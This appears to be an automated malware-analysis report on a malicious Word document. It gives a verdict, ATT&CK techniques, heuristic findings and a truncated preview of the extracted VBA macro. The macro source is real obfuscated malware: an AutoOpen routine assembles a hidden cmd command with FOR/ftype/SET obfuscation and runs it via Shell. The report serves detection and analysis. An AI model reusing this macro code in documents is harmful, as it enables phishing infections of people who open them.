Verdict: MALICIOUS (Risk Score 142)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro attempts to construct and execute a command string, likely to download and run a second-stage payload. The presence of the AutoOpen macro and the nature of the script strongly suggest a phishing attachment delivery vector.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6821700-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6821700-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31186 bytes |

SHA-256: 09820fccd0dd1315adb93c2ea19b16a7a740b562ef054d58e05b83a16e5e7b86
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "uBkjuGRtNH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
NmMvK = fEwUiH
MXzzz = Vtati
FEjdE = Gpjvc
DWVcP = Log(3303)
qEXJwh = dBNauh
ZAuEjuWh = "" + lYffWttj + lKLSXFRTQmT + CVar("cm") + WioRPfK + dGURAQFANfAVM + XjzTBMnQQ + QCTbPfFdAC + fARwbB + SnfjqwBC + zENVFzT + EJqCjk + RGTJPwzN + MZCRbGbJ + tAGIVQuE + WMVQj + LCSFauSGzm + MSdjuUiwzpc + dpvLidkoRwm + YiBmlmXC + jJAcaYYf + OFzOlBHb + XXHUmjEB + UQLizPQBoi + ujTzzRiEiz + wzzRziCQzc + LiPwBVubIMX + KCGUtN + iuJzuCKzOoU + FLpEwUCaNi + wYqqFk + qjDWwGqziq + QSdCBph + uwRVFBzNtfj + vXuQBjpiwiP + pZJJazh + lupUPiC + rDcwhAhZ + RdEizDvzis + qIujCqlXS + IJbXv + PDBLZRZvk + DHRzUoJ + miLwmY + EANPYnj + uhNtJilW
QtrUY = Round(51)
dmuRHC = Hex(PQbCG - CYrzC)
Shell@ ZAuEjuWh, 0
sfpXsn = CLng(MNjprp * tksmi)
End Sub
Attribute VB_Name = "tGiQXNrCsSX"
Function XjzTBMnQQ()
On Error Resume Next
iAqmUn = "d "
FFMEwouNzXN = " " + "/c " + " " + " " + " FOR /F " + CStr(Chr(fhqntMVnGnj + GAjGTNNl + 34 + RoopqMTVWjS + WRWctIWb)) + "t"
ABTEQ = Oct(PzPNpH)
fMstmqR = "oke" + "ns=2 delim" + "s=6JcHF" + CStr(Chr(wsSvUwj + ACZzFWfbnRNdp + 34 + NowlUdJCGjrzX + ZpwcQHwSRFOjiJ)) + " %B" + " IN"
XhjdCsaCj = " ('fty" + "pe" + "^|find" + " " + CStr(Chr(GCdhjzvRMqz + NZIKosXfM + 34 + QWffFwatIIlu + SathQZHdCDfG)) + "m" + "dF" + CStr(Chr(RZwtduRJTQLPPG + ciNbWSiz + 34 + bnTbzzajbjLrRz + GdWAJATv)) + "'"
nisiH = RYNusw
sucrKk = lXIJu
HzOzWChhifQ = ")DO %" + "B /V/C" + " " + " " + CStr(Chr(svXzvwz + iqsQLpjib + 34 + MOJOMAbvpaUY + GiJcnNunjnSNNK)) + " "
IJXBq = CDate(loDhBl - MkIFaG)
zljaZB = Oct(91336 + nndic + KYBoE * 44000)
QwhMC = Oct(kYNwn)
cuzGcbSi = "SEt {" + "._=--_/-\" + "/_\/\-\/_ " + "_-\/_--_\" + "_\//-\ "
mtMwk = CStr(Pajur + BOdnNZ - XMPfbX * zPHWjP)
WiosMN = dAGtl
QLHwK = "_-\-" + "\/-__" + "\" + "_/\// /\--" + "/\\__\-/"
nEuimUPzFz = "_/- _\-" + "/-/_-" + "\-_//\_ -" + "_\-__" + "\/\//" + "-/_\ -_" + "\/"
XjzTBMnQQ = iAqmUn + FFMEwouNzXN + fMstmqR + XhjdCsaCj + HzOzWChhifQ + cuzGcbSi + QLHwK + nEuimUPzFz
RMhoPJ = NlbmY
KNbSN = ChrW(zzVNTz)
End Function
Function QCTbPfFdAC()
On Error Resume Next
hlnik = CStr(80610 / zaKiw * CQaoa / ptSTw)
SqTVRa = oEpwu
sFqZkXjbmXW = "\-\" + "//\_/" + "__" + "- \-"
NBIjs = zFmiXW
PSqAFX = 45
mMiNip = "__/_\\-/\/" + "--/ " + "/-\_" + "/-/_\\-" + "\__- _-"
sDqbz = Rnd(52334 - 53499 * LiofRL + lwUlj)
EihwP = Tan(60174 - 5208 / 14485 - dLkMol)
DjJpXH = 573
jsRFWopMadj = "_\-//\"
cPJCj = 1
viioV = Chr(15141 / FhPwI + PfizCB * 66533)
wAGSH = ChrB(TzCiF)
XUcLpPvF = "_/" + "\_-" + "/- //" + "_/" + "/_\-\-" + "_--\_ \_/" + "_/--_\/"
wpsZrl = Atn(20329 - 19226 - 59960 * cLujU)
dIRkI = 7491
qoXNzbznHHj = "-_/\\ /_/-" + "\" + "-/_-\-/" + "\_\ -/\\" + "\___/-/_-"
oVCbEO = CLng(520347317)
Dmzdii = WFTFO
nzLvEj = "\- \_--\/\" + "_/_/-" + "\_-"
iUcFZw = ofclCP
GsBdLpCdLC = " /-\/\\\--" + "__//__ _//" + "/_-\-\"
QCTbPfFdAC = sFqZkXjbmXW + mMiNip + jsRFWopMadj + XUcLpPvF + qoXNzbznHHj + nzLvEj + GsBdLpCdLC
oqfruV = 485367124
End Function
Function fARwbB()
On Error Resume Next
nvioDB = Sgn(DXXHbJ)
qAKBBSk = "\--\_/ /"
wTBwb = Rnd(263166597)
cTAQUwwmz = "/_\/-\/" + "\__-_-\"
sRYYt = Rnd(2)
RGinfMU = "}"
PWPsqb = "_\/-_/\"
lFmDQ = Round(baCwsk)
Dadrws = tcMdws
idziwB = CInt(uXijG * mcKJUN)
ThViLzA = "-__" + "-\/"
KGIMq = Sin(66063 / 8336)
Cpwro = Round(51)
zICnV = "\/}" + "/--/-_/\\" + "_/_" + "\-_{/_-\-"
JaCVrz = Round(dAuVD / Dzhlz)
OmXqajSE = "-\__/" + "_-/\\h\" + "--\" + "/" + "___/-/\-/"
zVVGhv = CSng(5859 * CopGMj)
HWcanJnv = "\c\-" + "\/-_\__/" + "-/_-\t" + "_-\_\//"
fARwbB = qAKBBSk + cTAQUwwmz + RGinfMU + PWPsqb + ThViLzA + zICnV + OmXqajSE + HWcanJnv
TIzjp = 185816532
TzzqQG = JRGKEj
End Function
Function
```

... (truncated)